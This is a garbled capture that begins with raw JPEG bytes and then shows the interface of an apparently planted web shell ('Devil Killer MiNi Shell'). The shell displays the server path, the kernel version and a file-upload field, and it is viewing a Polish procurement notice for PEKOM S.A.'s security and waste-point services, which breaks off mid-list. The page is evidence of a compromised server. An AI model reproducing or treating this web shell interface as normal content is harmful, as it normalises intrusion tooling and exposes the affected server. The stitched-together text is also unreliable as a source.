JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241213/0065341301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie usług ochrony obiektów i mienia oraz prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych – JG/10/2024” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Komunalne &#34;PEKOM&#34; S.A.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970023062</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Św. Brata Alberta 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żary</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">68-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">684794600</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">684794602</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">a.wisniewska@pekom.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pekom.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Przedsiębiorstwo Komunalne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie usług ochrony obiektów i mienia oraz prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych – JG/10/2024” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b748c9c8-28ff-4f05-af18-1724a850cd3f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00653413</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00103947/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 „Świadczenie usług ochrony obiektów i mienia oraz prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.12.) Rodzaj wykonawców, którzy mogą ubiegać się o udzielenie zamówienia: </h3> <p class="mb-0">art. 94 ust. 1 pkt 1) ustawy</p> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b748c9c8-28ff-4f05-af18-1724a850cd3f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl, a w przypadku awarii Platformy za pośrednictwem poczty elektronicznej na adres:<br/>a.wisniewska@pekom.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Przeglądanie i pobieranie publicznej<br/>treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania do Platformy e-<br/>Zamówienia.<br/>2. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>3. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych , sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i<br/>przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały<br/>bezpośredniego zastosowania.<br/>4. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej: a) w formatach<br/>danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się<br/>jako załącznik), lub<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>5. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U.<br/>z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w<br/>wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę<br/>przedsiębiorstwa”.<br/>6. Komunikacja w postępowaniu, z wyłączeniem składania ofert (sposób składania opisano w pkt 12 SWZ), odbywa się drogą<br/>elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za<br/>pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i<br/>udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk<br/>„dodaj załącznik”).<br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>7. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>8. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/79 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str.1), dalej &#34;RODO&#34;, informuję, że:<br/>1)	administratorem Pani/Pana danych osobowych jest: Przedsiębiorstwo Komunalne &#34;PEKOM&#34; S.A., ul. Św. Brata Alberta 8, 68-200 Żary;<br/>2)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Świadczenie usług ochrony obiektów i mienia oraz prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych - JG/10/2024&#34;;<br/>3)	w niektórych sytuacjach Zamawiający może przekazywać Pani/Pana dane osobowe osobom trzecim, jeśli będzie to konieczne do dochodzenia praw i obowiązków wynikających z zawartej umowy lub obowiązujących przepisów prawa; <br/>4)	Pani/Pana dane osobowe będą przekazywane wyłącznie osobom upoważnionym przez Zamawiającego tj. pracownikom i współpracownikom Zamawiającego, którzy muszą mieć dostęp do danych, aby wykonywać swoje obowiązki, podmiotom przetwarzającym, którym Zamawiający zleci to zadanie, innym odbiorcom danych, np. kurierom (placówkom pocztowym), bankom, ubezpieczycielom, kancelariom prawnym lub instytucjom upoważnionym z mocy prawa do otrzymania przedmiotowych danych; <br/>5)	odbiorcami Pani/Pana danych osobowych będą ponadto osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późń. zm.);<br/>6)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 p.z.p., przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy oraz przez okres wykonywania przez Zamawiającego ciążących na nim obowiązków prawnych, w którym przepisy prawa nakazują Zamawiającemu przechowywać dane osobowe, w którym Zamawiający może ponieść konsekwencje prawne niewykonania obowiązków wynikających z przepisów prawa oraz ustalenia, obrony i dochodzenia roszczeń oraz wierzytelności przez Zamawiającego;<br/>7)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach p.z.p., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z p.z.p.; <br/>8)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>9)	posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO , ; <br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>10)	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">JG/10/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 221565,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usługi ochrony polegającej na wykonaniu stałej ochrony fizycznej obiektów, mienia oraz osób przebywających na terenie P.K. „PEKOM” S.A. z siedzibą w Żarach. <br/>2.	Zamawiający oczekuje świadczenia usługi ochrony obiektów, mienia oraz osób przebywających na terenie P.K. „PEKOM” S.A.: <br/>	dni robocze (poniedziałek - piątek) od godz. 15:00 do 08:00,<br/>	dni wolne od pracy (sobota, niedziela i święta) całodobowo,<br/>Liczba pracowników powinna być dostosowana do powierzchni i charakteru obiektu podlegającego ochronie lecz nie mniej niż 1 pracownik ochrony na zmianie.<br/>3.	Przez ochronę mienia i osób rozumie się działania zapobiegające przestępstwom i wykroczeniom przeciwko osobom i/lub mieniu, a także przeciwdziałające utracie mienia, powstawaniu w nim szkody oraz działania niedopuszczające do wstępu osób nieuprawnionych na teren chroniony. <br/>4.	Usługę ochrony obiektów, mienia oraz osób przebywających na terenie Zakładu będą mogli wykonywać pracownicy ochrony, którzy zapoznali się z zasadami ochrony przeciwpożarowej oraz z zakresu obsługi systemu telewizji dozorowej CCTV.<br/>5.	Świadczenie usługi ochrony obiektów, mienia oraz osób przebywających na terenie Przedsiębiorstwa wykonywane będzie przez pracowników ochrony poprzez: <br/>1)	ciągłą obserwację i kontrolę zainstalowanych, w udostępnionym przez Zamawiającego pomieszczeniu-portierni, systemów telewizji dozorowej CCTV – udostępnione pomieszczenie jest monitorowane w systemie online wraz z archiwizacją danych, nie mogą w nim przebywać osoby postronne, w tym także nieuprawnieni pracownicy Zamawiającego; <br/>2)	okresowe obchody terenu Przedsiębiorstwa (obiekty, sprzęt, drogi, place, itp.), realizowane zgodnie z obowiązującą trasą obchodu - punktów kontrolnych - przy użyciu systemu np. &#34;Active Guard&#34; lub równoważny; <br/>3)	kontrolę stanu ogrodzenia. <br/>Dokonanie obchodu każdorazowo powinno być potwierdzone za pomocą urządzeń kontrolno-monitorujących będących na wyposażeniu Wykonawcy i zainstalowanych w wyznaczonych punktach na chronionym terenie. <br/>6.	Do zadań Wykonawcy będzie należało:<br/>1)	ochrona obiektów, budynków, maszyn, urządzeń oraz infrastruktury technicznej i drogowej znajdujących się na terenie Zakładu. Wykonawca jest zobowiązany do ochrony fizycznej wymaganej przez Zamawiającego w sposób zapewniający należyte zabezpieczenie osób i mienia; <br/>2)	obsługa Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK):<br/>- dni robocze (poniedziałek - piątek) od godz. 15.45 do godz. 18.00,<br/>- dni wolne od pracy (sobota) od godz. 8.00 do godz. 12.00.<br/>7.	Wykonawca zobowiązuje się do: <br/>1)	powierzenia realizacji zamówienia pracownikom ochrony o odpowiednim stanie zdrowia pozwalającym na wykonywanie powierzonych im obowiązków wynikających z niniejszego zamówienia;<br/>2) zmiany, w uzasadnionych przypadkach, pracownika ochrony na żądanie Zamawiającego; <br/>3)	zapewnienia pracownikom ochrony odpowiedniego wyposażenia, niezbędne do prawidłowej realizacji usługi, w tym co najmniej: <br/>a)	jednolitego umundurowania służbowego; <br/>b)	imiennych identyfikatorów; <br/>c)	latarki; <br/>8.	Obowiązki pracowników ochrony: <br/>1)	w zakresie dozoru systemów alarmowego i monitoringu Zakładu, zobowiązany jest do: <br/>a)	wykonywania czynności ochrony obiektów i mienia, polegających na obserwowaniu terenu i obiektów oraz ich wnętrz, poprzez system zainstalowanych kamer, a także podejmowaniu właściwych czynności zapobiegających powstaniu lub likwidacji zagrożenia dla działalności Zamawiającego, w tym jakichkolwiek uszkodzeń mienia;<br/>b)	powiadamiania wyznaczonego pracownika Zamawiającego oraz odpowiednie służby o przypadkach wystąpienia sytuacji kryzysowych i zagrożeniach na chronionym terenie takich jak: awarie, pożar i inne zdarzenia losowe, kradzież z włamaniem, zagrożenie wybuchem, rabunek i inne wraz z jednoczesnym podjęciem działań zabezpieczających mienie Zamawiającego; <br/>2)	w zakresie bezpośredniej ochrony terenu Zakładu, zobowiązany jest do:<br/>a)	wykonywania obchodów chronionego terenu, zgodnie z wytycznymi;<br/>b)	zamykania wyznaczonych pomieszczeń;<br/>c)	dokonywania, w trakcie wykonywanych obchodów, sprawdzenia prawidłowego zabezpieczenia drzwi, okien, bram, itp. oraz każdorazowego powiadamiania uprawnionego pracownika Zamawiającego o nieprawidłowościach stwierdzonych w tym zakresie oraz podjętych działaniach zmierzających do zabezpieczenia zagrożonego miejsca; <br/>3)	w pozostałym zakresie, zobowiązuje się do: <br/>a)	należytego przechowywania powierzonych kluczy do chronionego /chronionych obiektów, ich wydawania oraz prowadzenia ewidencji kluczy wydawanych osobom upoważnionym; <br/>b)	prowadzenia Książki służb, z uwzględnieniem szczegółowego zapisu przebiegu służby, w tym wszelkich informacji związanych z nieprawidłowościami stwierdzonymi w tym zakresie oraz podjętymi działaniach zmierzających do zabezpieczenia zagrożonego miejsca oraz wpisem poleceń wydawanych przez osoby upoważnione; <br/>c)	zapoznania się z rozmieszczeniem i obsługą głównych wyłączników prądu, urządzeń ppoż., zaworów wodnych i innych systemów monitorowania alarmów, <br/>d)	pełnej znajomości topografii chronionych obiektów i mienia, <br/>e)	znajomości urządzeń i systemów zabezpieczających obiekt oraz stałego doskonalenia umiejętności ich obsługi; <br/>f)	wydawania teczek pojazdów wraz z kluczykami kierowcom;<br/>g)	w okresie zimowym odśnieżanie ciągów komunikacyjnych pieszych i okolic bramy umożliwiających jej otwarcie;<br/>h)	udzielanie informacji o osobach odpowiedzialnych za „Akcję zima” według wytycznych dostarczonych przez Zamawiającego.<br/>i)	kontrola warunków pogodowych według wytycznych dostarczonych przez Zamawiającego.<br/>j)	ważenie odpadów oraz wykonywanie innych czynności związanych z funkcjonowaniem Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK); Pracownicy Wykonawcy zostaną przeszkoleni z zakresu obsługi przez Pracownika Zamawiającego;<br/>k)	podlewanie terenów zielonych według wytycznych dostarczonych przez Zamawiającego.<br/>l)	wykonywania innych, niewymienionych powyżej czynności zleconych przez upoważnionego pracownika Zamawiającego pod warunkiem, że mieszczą się one w zakresie obowiązków stanowiących świadczenie usługi ochrony. <br/>9.	W ramach nadzoru Wykonawca zobowiązany jest do:<br/>1)	organizowania pracy pracowników ochrony,<br/>2) przygotowywania harmonogramów dyżurów pracowników ochrony i przedkładania ich Zamawiającemu nie później niż w dniu poprzedzającym rozpoczęcie ich obowiązywania (nie mniej niż miesięczny okres obowiązywania); <br/>3)	instruowania pracowników ochrony i kontrolowania wykonywanych przez nich zadań;<br/>4)	dokonywania interwencji w związku z zaistniałymi zagrożeniami dla bezpieczeństwa jednostki; <br/>5)	kontrolowanie pracowników ochrony przy użyciu systemu i urządzenia &#34; Active Guard&#34; lub równoważny oraz udostępnionego kanału monitoringu telewizji dozorowej CCTV portierni;<br/>6)	przestrzegania ustalonego porządku w Zakładzie, organizowania oraz wykonywania pracy zgodnie z obowiązującymi przepisami, zarządzeniami, instrukcjami oraz innymi aktami normatywnymi, a przede wszystkim: <br/>a)	przestrzegania tajemnicy służbowej, <br/>b)	rzetelnego i sumiennego wykonywania pracy, <br/>c)	przestrzegania obowiązującego czasu pracy, <br/>d)	przestrzegania obowiązujących zasad BHP i ochrony ppoż; <br/>7)	informowania uprawnionej osoby Zamawiającego o stanie załatwionych spraw i napotykanych trudnościach; <br/>8)	kierowania uwagi na należytą dbałość o urządzenia, materiały i inne mienie stanowiące własność Zamawiającego, zapobiegania marnotrawstwu i kradzieży mienia, powiadamiania o wszelkiego rodzaju zauważonych nadużyciach na szkodę Zamawiającego; <br/>9)	wykazywania inicjatywy w działaniu oraz dążenie do maksymalnego i ekonomicznego wykorzystywania sił i środków przy wykonywaniu zadań; <br/>10)	znajomości urządzeń i systemów zabezpieczających obiekt oraz stałego doskonalenia umiejętności ich obsługi; <br/>11)	systematycznego szkolenia podległych pracowników ochrony w zakresie umiejętności obsługi urządzeń i systemów zabezpieczających, w szczególności systemów telewizji dozorowej i urządzeń ppoż.; <br/>12)	realizacji innych zadań ochronnych wynikających z doraźnych poleceń wydawanych przez uprawnione osoby ze strony Zamawiającego. <br/>10.	Zamawiający zobowiązuje się do: <br/>1)	zapewnienia ciągłości i szczelności (należytego stanu technicznego) ogrodzenia terenu wokół Zakładu;<br/>2)	udostępnienia oraz utrzymywania w stanie sprawności technicznej zainstalowanych na terenie Zakładu urządzeń ppoż. oraz systemów telewizji dozorowej CCTV, umożliwiających monitorowanie obiektów znajdujących się na chronionym terenie;<br/>3)	zapewnienia oświetlenia wokół obiektów, na placach manewrowych, głównych drogach dojazdowych; <br/>11.	